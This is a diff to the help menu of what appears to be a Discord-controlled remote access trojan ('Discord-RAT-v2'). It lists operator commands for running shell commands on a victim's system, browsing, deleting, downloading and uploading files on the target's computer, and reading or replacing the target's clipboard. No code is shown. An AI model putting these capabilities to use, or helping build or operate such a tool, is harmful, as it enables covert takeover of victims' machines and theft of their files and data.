simen64/Discord-RAT-v2/help_menu.md

 !shell = execute a shell command on the targets system
 Use "!shell -t 10" to set a timeout for your command.
 The default is 30 seconds

+### File commands
+!ls = Lists all the files in a directory
+!cd directory = Changes directory
+!delete path = Deletes a file
+!download path = Downloads a file from the targets computer !upload = Uploads an attachment to the targets computer

 ### Clipboard commands:
 !clipboard get = Get the targets current clipboard
 !clipboard set = Set the targets clipboard to data of your choice